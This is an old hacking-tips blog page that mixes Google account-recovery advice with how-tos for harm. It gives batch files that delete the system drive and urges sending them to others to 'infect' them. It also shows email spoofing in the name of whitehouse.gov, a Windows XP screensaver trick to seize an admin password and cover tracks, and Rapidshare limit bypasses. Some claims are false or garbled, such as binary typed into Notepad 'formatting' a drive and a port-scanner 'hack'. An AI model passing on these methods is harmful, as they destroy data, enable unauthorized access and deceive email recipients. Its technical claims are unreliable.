This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

What to Do when Ur Orkut is Hacked!

It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.


Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:



1. Reset Your Google Account Password:


Type the email address associated with your Google Account or Gmail user name at google.com/accounts/ForgotPasswd - you will receive an email at your secondary email address with a link to reset your Google Account Password.
This will not work if the other person has changed your secondary email address or if you no longer have access to that address.


2. For Google Accounts Associated with Gmail:


If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.


3. For Hijacked Google Accounts Not Linked to Gmail:

If your Google Account doesn’t use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original “Google Email Verification” message.


It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.


Format a HDD with Notepad

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.


Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2.
Save As An EXE Any Name Will Do


Step 3.
Send the EXE to People And Infect


OR


IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\


01100110011011110111001001101101011000010111010000 100000011000110011101001011100


0010000000101111010100010010111101011000


format d:\ /Q/X — this will format your dirve d:\


01100110011011110111001001101101011000010111010000 100000011001000011101001011100


0010000000101111010100010010111101011000


format a:\ /Q/X — this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100


0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini — this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001


00100000011000110011101001011100011000100110111101 101111011101000010111001101001


0110111001101001


try to figure out urself rest
cant spoonfeed
its working


Do not try it on your PC. Don’t mess around this is for educational purpose only


still if you cant figure it out try this


go to notepad and type the following:


@Echo off
Del C:\ *.*|y


save it as Dell.bat


want worse then type the following:


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


and save it as a .bat file


Reply With Quote


Access Data of a Password Protected User in Windows XP in Case the PC Fails to Boot

You may come across a situation in which your windows XP PC fails to reboot, and the most accepted solution to that problem is to re-format the Hard Disk. Before formatting, you should backup your files. If your computer is password protected, you won’t be able to access them from outside, so here is a method for getting around this.



Steps :


  1. Boot the machine from Windows XP bootable CD.

  2. At the setup screen, select R to repair using Recovery Console.

  3. Now the console program will prompt you to select the Windows folder (eg. C:\WINDOWS) where the Windows is installed (you need to enter a number from the list of folders shown to you).

  4. Type ‘HELP’ (without single quotes) and press enter for available commands. This is like a DOS program, but some features are not available

  5. Change the current directory to the user’s directory where you want to backup.

  6. Type ‘CD “C:\Documents and Settings\X”‘ (without single quotes) and press enter. Where X is the username.

  7. Now the current directory will change to “C:\Documents and Settings\X”.

  8. Now change the directory to Desktop by entering ‘CD Desktop’ (without single quotes) and press enter to go to the desktop folder.

  9. Type ‘DIR’ (Without single quotes) and press enter, you will be listed all the available files in Desktop.

  10. Type ‘COPY a.doc D:\BACKUP’ (without quotes) and press enter, where a.doc is a file available in Desktop and the folder D:\BACKUP available to copy the files.

  11. As in step 7,8,9,10 you can backup other folders like “My Documents”, “My Music”, etc.

  12. Note that you cannot use wildcards for COPY, i.e. you cannot copy all the files in a folder at once. You must copy one file by one.



Tips :


Before doing this, try changing the password to blank so that you can access the data from another machine to easily drag and drop to copy your data.


Warnings :


Any data not backed up will be permanently deleted when you re-format the hard drive, so make sure you back up any thing you want to keep.


Things You’ll Need :


A Bootable Windows XP CD


Fastest Way to Hack into Others System

Well as I already mentioned you can hack any system which is connected to what we call “The INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked.

Steps: -



  1. Download the Software PORT SCANNER from google.

  2. Get the IP address of the victim whose port is open.

  3. NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet….

  4. The IP of victim u found initially into NETLAB .

  5. Thats it now you can access his system.


Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don’t try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily.

Good Luck!

Learn how to send your fake email

So, you want to learn how to send your own fake mail? It’s extraordinarily easy to do, and requires no extra software installed on your PC at all. It can be done with Windows, Macintosh, Linux - any modern PC that has an internet connection will do it.


There are a just a few simple steps. First, you’ll need to decide on the FROM and the TO email addresses. If the FROM address that you’re choosing isn’t a real one, make sure that the domain name (the bit after the @ sign) is a real one. If it’s not a real one, it almost certainly won’t work.




For the purpose of this tutorial, we’ll be sending from bush@whitehouse.gov to dummy@anysite.com.


Second, you’ll need to find out the mail server that your recipient is using.

















Click Start, Run, enter “CMD”, then presss OK. In the window that comes up, type nslookup -q=MX anysite.com
Go to Applications, Utilities, and choose Terminal. In the window that comes up, type nslookup -q=MX anysite.com
Bring up your favourite shell, and type nslookup -q=MX anysite.com

There will be a lot of information on the screen - all you need to look for is a line that talks about a mail exchanger. If there are several, pick the one with the lowest “preference number”.


anysite.com        MX preference = 10, mail exchanger = mail.anysite.com

Now, you’ll need to connect to this mail exchanger using telnet. This is the same for any PC, but Vista users may not have it installed by default - see this note about getting telnet on Vista before you continue. When you’re ready, type:


telnet mail.anysite.com 25

Press enter, and after a short pause, you should see a welcome message from the server.


Ok, so now you’re connected. You need to enter the following information - press ENTER at each new line. You won’t be able to press backspace to delete a mistake, so you’ll need to type everything correctly first time!


HELO whitehouse.gov

This tells the mail server that we are “whitehouse.gov”.


MAIL FROM:

This tells the server who is sending the mail.


RCPT TO:

This tells the server who to deliver the mail to. At this point, if the recipient doesn’t exist, you may see a warning message (but not always).


DATA

This tells the server that we’re ready to start writing our message. It should acknowledge, telling you to end your message with a full stop (period) on a single line. All we need to do now, is write our message and don’t forget that full stop at the end.

Hello dummy@anysite, I managed to send a fake mail all by myself!.

Dont forget that last dot. When you’ve done that, and pressed enter, simply enter QUIT and your mail should be delivered.


There’s a little bit more to it, of course. You’ll need to enter proper “headers” if you want the mail to look more believable. After doing the DATA command, I’d recommend pasting in the following “headers” to make sure it looks realistic when viewed in Outlook, Hotmail, etc.


Date: Sun, 01 Apr 2007 12:49:13 +0100 (BST)From: George W Bush To: Poor Sod Subject: Fake mail

Hello dummy@anysite, I managed to send a fake mail all by myself!.

And that’s all there is to it.


Hacks to Beat Rapidshare Download Limits and Waiting Time



Many visitors had asked me about bypassing Rapidshare download limits and Wait time so I went through some sites and found some very cool tricks which I have written in this article. If you have got any more tips you just tell me and I will write it in my article.





Rapidshare has been an excellent tool for sharing large files. Recently users have discovered ways of bypassing the download limits and skipping the waiting time. Here are a description of these methods.


Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the rapidshare server a different IP address.


Here are some methods for doing this:


1. Short-Out the JavaScript:

    1. Goto the page you want to download
    2. Select FREE button
    3. In the address bar put the following: javascript:alert(c=0)
    4. Click OK
    5. Click OK to the pop-up box
    6. Enter the captcha
    7. Download Your File

2. Request a new IP address from your ISP server.

    Here’s how to do it in windows:
    1. Click Start
    2. Click run
    3. In the run box type cmd.exe and click OK
    4. When the command prompt opens type the following. ENTER after each new line.
    ipconfig /flushdns
    ipconfig /release
    ipconfig /renew
    exit

    5. Erase your cookies in whatever browser you are using.
    6. Try the rapidshare download again.



Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

3. Use a proxy with SwitchProxy and Firefox:


4. Use an anonymous service:

    Running your system through the tor network should in theory work; however, it is difficult to use and setup. Plus, you allow others to run their evil deeds through your system as well by using this system. Anonymizer 2005 is inexpensive, easy to use, but not free. Other pay services would likely work as well.

5. You can use a bookmarklet to stop your wait times:

    1. Open IE
    2. Right Click On This Link
    3. Select Add to Favorites
    4. Select Yes to the warning that the bookmark may be unsafe.
    5. Name it “RapidShare No Wait”
    6. Click on the Links folder (if you want to display it in your IE toolbar)
    7. Click OK
    8. You may need to close and reopen IE to see it
    9. Goto rapidshare and click the bookmarklet when you are forced to wait

How to Hack Windows XP Admin Password

If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly :


cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos




Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt without logging into XP.


Once this happens if you enter this command :


net user password


If the Administrator Account is called Frank and you want the password blah enter this


net user Frank blah


and this changes the password on franks machine to blah and your in.


Have Fun!


p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks